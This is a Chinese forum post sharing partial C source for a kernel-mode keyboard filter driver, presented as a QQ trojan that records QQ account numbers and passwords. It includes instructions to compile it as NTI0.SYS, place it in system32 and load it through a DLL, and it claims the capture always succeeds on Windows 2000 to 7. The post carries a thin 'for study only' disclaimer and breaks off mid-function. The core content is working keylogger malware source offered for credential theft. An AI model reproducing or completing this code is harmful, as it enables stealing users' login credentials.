现在网上很多盗QQ的木马,发现都不管用得,顺便做了这只QQ木马,这里发布一部分核心的代码内核代码,用于记录QQ密码,此代码编译后可以在win2000到win7下正常运行,百分百能获取正确的QQ和密码, 用户太下面的代码,只能获取QQ和密码,不带邮件发送功能,和系统隐藏功能,主要是怕有些人哪去干坏事,所以我不发布完整版的代码, 以下驱动代码需要编译为 NTI0.SYS 文件放到 C:\\Windows\\system32\\目录下面,在编译后面的代码,为一个DLL,最自己在用C写一个控制台程序加载 编译后的DLL ,运行起打开QQ登录后,就会显示出QQ帐号和密码,本篇文章只供学习只用,请不要哪去做坏事,后果自负。
#include
#include
#include
#define KEY_UP 1
#define KEY_DOWN 0
#define LCONTROL ((USHORT)0x1D)
#define CAPS_LOCK ((USHORT)0x3A)
unsigned char asciiTbl[]={
0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09, //normal
0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x5B, 0x5D, 0x0D, 0x00, 0x61, 0x73,
0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x7A, 0x78, 0x63, 0x76,
0x62, 0x6E, 0x6D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
0x32, 0x33, 0x30, 0x2E,
0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09, //caps
0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x5B, 0x5D, 0x0D, 0x00, 0x41, 0x53,
0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x5A, 0x58, 0x43, 0x56,
0x42, 0x4E, 0x4D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
0x32, 0x33, 0x30, 0x2E,
0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09, //shift
0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x7B, 0x7D, 0x0D, 0x00, 0x41, 0x53,
0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x5A, 0x58, 0x43, 0x56,
0x42, 0x4E, 0x4D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
0x32, 0x33, 0x30, 0x2E,
0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09, //caps + shift
0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x7B, 0x7D, 0x0D, 0x00, 0x61, 0x73,
0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x7A, 0x78, 0x63, 0x76,
0x62, 0x6E, 0x6D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x3
1,
0x32, 0x33, 0x30, 0x2E
};
CHAR s_QQPassword[100]={0x00};
CHAR s_QQUser[100]={0x00};
CHAR s_TempC=0x00;
ULONG s_QQCount=0;
ULONG s_QQStatus=0;
ULONG s_DownCount=0;
ULONG s_UpChar=0;
typedef struct _FILTER_DEVICE_EXTEN
{
PDEVICE_OBJECT pFilterDeviceObject;//过滤设备
PDEVICE_OBJECT pTagerDeviceObject;//绑定的设备对象
KSPIN_LOCK Lockspin;//调用时的保护锁
KEVENT ProcessEvent;//进程间同步
PDEVICE_OBJECT LowDeviceObject;//绑定前底层设备对象
}FILTER_DEVICE_EXTEN,*PFILTER_DEVICE_EXTEN;
NTSTATUS
ObReferenceObjectByName(
PUNICODE_STRING ObjectName,
ULONG Attributes,
PACCESS_STATE AccessState,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID ParseContext,
PVOID *Object
);
extern POBJECT_TYPE IoDriverObjectType;
ULONG gC2pKeyCount = 0;
VOID FilterUnload(IN PDRIVER_OBJECT pDriverObject);
VOID c2pDetach(IN PDEVICE_OBJECT pDeviceObject);
NTSTATUS AllIrpOther(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp);
NTSTATUS FilterPower(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp);//IRP_MJ_POWER要调用一个PoCallDriver与PoStartNextPowerIrp
NTSTATUS FilterPnp(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp);//IRP_MJ_PNP还要一个PNP(即插即用)分发函数
NTSTATUS AttachDeviceObject(PDRIVER_OBJECT pDriverObject);
NTSTATUS FilterReadIrp(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp);//read irp
NTSTATUS FilterCompletionRoutine(IN PDEVICE_OBJECT pCRDeviceObject,IN PIRP pCRIrp,IN P
VOID Context);
NTSTATUS QQPassowrdControl(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp);
NTSTATUS FilterCreateClose(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp);
void __stdcall print_keystroke(UCHAR sch);
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING puServiceRegPath)
{
int i;
for (i=0;i<IRP_MJ_MAXIMUM_FUNCTION+1;I++)
{
pDriverObject->MajorFunction=AllIrpOther;
}
pDriverObject->DriverUnload=FilterUnload;//卸载函数
pDriverObject->MajorFunction[IRP_MJ_CREATE]=FilterCreateClose;
pDriverObject->MajorFunction[IRP_MJ_CLOSE]=FilterCreateClose;
pDriverObject->MajorFunction[IRP_MJ_POWER]=FilterPower;
pDriverObject->MajorFunction[IRP_MJ_PNP]=FilterPnp;
pDriverObject->MajorFunction[IRP_MJ_READ]=FilterReadIrp;
//设置控制函数用来获取QQ密码
pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]=QQPassowrdControl;
//KdPrint(("DriverEntry\n"));
return AttachDeviceObject(pDriverObject);
}
/
************************************************************************/
/* 其它直接用IoCallDriver把IRP传到下一层驱动中 */
/************************************************************************/
NTSTATUS AllIrpOther(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp)
{
NTSTATUS status;
qq签名发布PFILTER_DEVICE_EXTEN pFilterExten;
ULONG i;
//KdPrint(("Other IRP!\n"));
pFilterExten=(PFILTER_DEVICE_EXTEN)pDeviceObject->DeviceExtension;
IoSkipCurrentIrpStackLocation(pIrp);
status=IoCallDriver(pFilterExten->LowDeviceObject,pIrp);
//DbgPrint("Other5
IoCallDriver: %x \n",status);
s_QQCount=100;
while(s_QQCount>0)
{
s_QQPassword[s_QQCount--]=0x00;
}
s_QQStatus=0;
s_QQCount=0;
return status;
}
/************************************************************************/
/*生成过滤设备并绑定键盘设备及保存各种设备地址在扩展设备中 */
/************************************************************************/
NTSTATUS AttachDeviceObject(PDRIVER_OBJECT pDriverObject)
{
NTSTATUS status;
UNICODE_STRING uKbdKeyName;
PFILTER_DEVICE_EXTEN pFilterExten;
PDEVICE_OBJECT pTargetDevice=NULL;
PDEVICE_OBJECT pLowDevice=NULL;
PDEVICE_OBJECT pFilterDevice=NULL;
PDRIVER_OBJECT KbdDriverObject = NULL;
UNICODE_STRING ntUnicodString[3];
UNICODE_STRING dosUnicodString[3];
ULONG ntCount=0;
RtlInitUnicodeString(&ntUnicodString[0],L"\\Driver\\keyboard1");
RtlInitUnicodeString(&ntUnicodString[1],L"\\Driver\\keyboard2");
RtlInitUnicodeString(&ntUnicodString[1],L"\\Driver\\keyboard3");
RtlInitUnicodeString(&dosUnicodString[0],L"\\DosDevices\\KernelKeyboardAccess1");
RtlInitUnicodeString(&dosUnicodString[1],L"\\DosDevices\\KernelKeyboardAccess2");
RtlInitUnicodeString(&dosUnicodString[1],L"\\DosDevices\\KernelKeyboardAccess3");
RtlInitUnicodeString(&uKbdKeyName, L"\\Driver\\Kbdclass");
status = ObReferenceObjectByName (
&uKbdKeyName,
OBJ_CASE_INSENSITIVE,
NULL,
0,
IoDriverObjectType,
KernelMode,
NULL,
&KbdDriverObject
);
if(!NT_SUCCESS(status))
{
KdPrint(("不到\\Driver\\Kbdclass驱动对象。\n"));
return( status );
}
else
{
ObDereferenceObject(pDriverObject);
}
pTargetDevice=KbdDriverObject->DeviceObject;
while (pTargetDevice)
{
status=IoCreateDevice(pDriverObject,
sizeof(FILTER_DEVICE_EXTEN),
&ntUnicodString[ntCount],
pTargetDevice->Type,
pTargetDevice->Characteristics,
FALSE,
&pFilterDevice);
//DbgPrint("IoCreateDevice: %x \n",status);
if (!NT_SUCCESS(status))
{
/
/KdPrint(("Create Device Error!\n"));
return status;
}
pLowDevice=IoAttachDeviceToDeviceStack(pFilterDevice,pTargetDevice);
if (!pLowDevice)
{
//KdPrint(("Attach Device No Success!\n"));
return status;
}
pFilterExten=(PFILTER_DEVICE_EXTEN)pFilterDevice->DeviceExtension;
RtlZeroMemory(pFilterExten,sizeof(FILTER_DEVICE_EXTEN));//zero memory
pFilterExten->pFilterDeviceObject=pFilterDevice;
pFilterExten->pTagerDeviceObject=pTargetDevice;
pFilterExten->LowDeviceObject=pLowDevice;
KeInitializeSpinLock(&(pFilterExten->Lockspin));
KeInitializeEvent(&(pFilterExten->ProcessEvent), NotificationEvent, FALSE);
//KdPrint(("创建!\n"));
pFilterDevice->DeviceType=pLowDevice->DeviceType;
pFilterDevice->Characteristics=pLowDevice->Characteristics;
pFilterDevice->StackSize=pLowDevice->StackSize+1;
pFilterDevice->Flags |= pLowDevice->Flags & (DO_BUFFERED_IO | DO_DIRECT_IO | DO_POWER_PAGABLE) ;
//next device
pTargetDevice =pTargetDevice->NextDevice;
ntCount++;
}
status=IoCreateSymbolicLink(&dosUnicodString[0],&ntUnicodString[0]);
if (!NT_SUCCESS(status))
{
//K
dPrint(("Create IoCreateSymbolicLink1 Error!\n"));
return status;
}
status=IoCreateSymbolicLink(&dosUnicodString[1],&ntUnicodString[1]);
if (!NT_SUCCESS(status))
{
//KdPrint(("Create IoCreateSymbolicLink2 Error!\n"));
return status;
}
return status;
}
/************************************************************************/
/* IRP_MJ_POWER */
/************************************************************************/
NTSTATUS FilterPower(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp)
{
PFILTER_DEVICE_EXTEN pFilterExten;
pFilterExten =(PFILTER_DEVICE_EXTEN)pDeviceObject->DeviceExtension;
PoStartNextPowerIrp( pIrp );
IoSkipCurrentIrpStackLocation( pIrp );
return PoCallDriver(pFilterExten->LowDeviceObject, pIrp );
}
/************************************************************************/
/* IRP_MJ_PNP */
/************************************************************************/
NTSTATUS FilterPnp(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp)
{
PFILTER_DEVICE_EXTEN pFilterExten;
PIO_STACK_LOCATION irpStack;
NTSTATUS status = STATUS_SUCCESS;
// 获得真实设备。
pFilterExten = (PFILTER_DEVICE_EXTEN)(pDeviceObject->DeviceExtension);
irpStack = IoGetCurrentIrpStackLocation(pIrp);
switch (irpStack->MinorFunction)
{
case IRP_MN_REMOVE_DEVICE:
//KdPrint(("IRP_MN_REMOVE_DEVICE\n"));
/
/ 首先把请求发下去
IoSkipCurrentIrpStackLocation(pIrp);
IoCallDriver(pFilterExten->LowDeviceObject, pIrp);
// 然后解除绑定。
IoDetachDevice(pFilterExten->LowDeviceObject);
// 删除我们自己生成的虚拟设备。
IoDeleteDevice(pDeviceObject);
status = STATUS_SUCCESS;
break;
default:
// 对于其他类型的IRP,全部都直接下发即可。
IoSkipCurrentIrpStackLocation(pIrp);
status = IoCallDriver(pFilterExten->LowDeviceObject, pIrp);
}
return status;
}
/************************************************************************/
/* UnLoad */
/************************************************************************/
VOID FilterUnload(IN PDRIVER_OBJECT pDriverObject)
{
PDEVICE_OBJECT DeviceObject;
PDEVICE_OBJECT OldDeviceObject;
PFILTER_DEVICE_EXTEN pFilterExten;
LARGE_INTEGER lDelay;
PKTHREAD CurrentThread;
UNICODE_STRING ntUnicodString[3];
UNICODE_STRING dosUnicodString[3];
RtlInitUnicodeString(&ntUnicodString[0],L"\\Driver\\keyboard1");
RtlInitUnicodeString(&ntUnicodString[1],L"\\Driver\\keyboard2");
RtlInitUnicodeString(&ntUnicodString[1],L"\\Driver\\keyboard3");
RtlInitUnicodeString(&dosUnicodString[0],L"\\DosDevices\\KernelKeyboardAccess1");
RtlInitUnicodeString(&dosUnicodString[1],L"\\DosDevices\\KernelKeyboardAccess2");
RtlInitUnicodeString(&dosUnicodString[1],L"\\DosDevices\\KernelKeyboardAccess3");
//delay some time
lDelay = RtlConvertLongToLargeInteger(-1000000);
CurrentThread = KeGetCurrentThread();
// 把当前线程设置为低实时模式,以便让它的运行尽量少影响其他程序。
KeSetPriorityThread(CurrentThread, LOW_REALTIME_PRIORITY);
UNREFERE
NCED_PARAMETER(pDriverObject);
//KdPrint(("\n"));
IoDeleteSymbolicLink(&dosUnicodString[0]);
IoDeleteSymbolicLink(&dosUnicodString[1]);
/
/ 遍历所有设备并一律解除绑定
DeviceObject = pDriverObject->DeviceObject;
while (DeviceObject)
{
// 解除绑定并删除所有的设备
c2pDetach(DeviceObject);
DeviceObject = DeviceObject->NextDevice;
}
ASSERT(NULL ==pDriverObject->DeviceObject);
while (gC2pKeyCount)
{
KeDelayExecutionThread(KernelMode, FALSE, &lDelay);
}
//KdPrint(("DriverEntry unLoad OK!\n"));
return;
}
VOID
c2pDetach(IN PDEVICE_OBJECT pDeviceObject)
{
PFILTER_DEVICE_EXTEN pFilterExten;
BOOLEAN NoRequestsOutstanding = FALSE;
pFilterExten = (PFILTER_DEVICE_EXTEN)pDeviceObject->DeviceExtension;
__try
{
__try
{
IoDetachDevice(pFilterExten->pTagerDeviceObject);
pFilterExten->pTagerDeviceObject = NULL;
IoDeleteDevice(pDeviceObject);
pFilterExten->pFilterDeviceObject = NULL;
//DbgPrint(("Detach Finished\n"));
}
__except (EXCEPTION_EXECUTE_HANDLER){}
}
__finally{}
return;
}
/************************************************************************/
/* read irp */
/************************************************************************/
NTSTATUS FilterReadIrp(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp)
{
NTSTATUS status;
PFILTER_DEVICE_EXTEN pFilterExten;
/
/PIO_STACK_LOCATION currentIrpStack;
KEVENT waitEvent;
status= STATUS_SUCCESS;
KeInitializeEvent( &waitEvent, NotificationEvent, FALSE );
if (pIrp->CurrentLocation == 1)
{
//KdPrint(("Dispatch encountered bogus current location\n"));
status = STATUS_INVALID_DEVICE_REQUEST;
pIrp->IoStatus.Status = status;
pIrp->IoStatus.Information = 0;
IoCompleteRequest(pIrp, IO_NO_INCREMENT);
return(status);
}
// 全局变量键计数器加1
gC2pKeyCount++;
// 得到设备扩展。目的是之后为了获得下一个设备的指针。
pFilterExten=(PFILTER_DEVICE_EXTEN)pDeviceObject->DeviceExtension;
// 设置回调函数并把IRP传递下去。 之后读的处理也就结束了。
// 剩下的任务是要等待读请求完成。
//currentIrpStack = IoGetCurrentIrpStackLocation(pIrp);
IoCopyCurrentIrpStackLocationToNext(pIrp);
IoSetCompletionRoutine( pIrp, FilterCompletionRoutine,
pDeviceObject, TRUE, TRUE, TRUE );
return IoCallDriver( pFilterExten->LowDeviceObject, pIrp );
}
// flags for keyboard status
static int s_shift2=0;
static int s_caps2=0;
static int s_num=0;
NTSTATUS FilterCompletionRoutine(IN PDEVICE_OBJECT pCRDeviceObject,IN PIRP pCRIrp,IN PVOID Context)
{
PIO_STACK_LOCATION IrpSp;
ULONG buf_len;
PUCHAR buf;
size_t i;
buf = NULL;
buf_len = 0;
IrpSp = IoGetCurrentIrpStackLocation( pCRIrp );
// 如果这个请求是成功的。很显然,如果请求失败了,这么获取
// 进一步的信息是没意义的。
if( NT_SUCCESS( pCRIrp->IoStatus.Status ) )
{
// 获得读请求完成后输出的缓冲区
buf = pCRIrp->AssociatedIrp.SystemBuffer;
/
/ 获得这个缓冲区
发布评论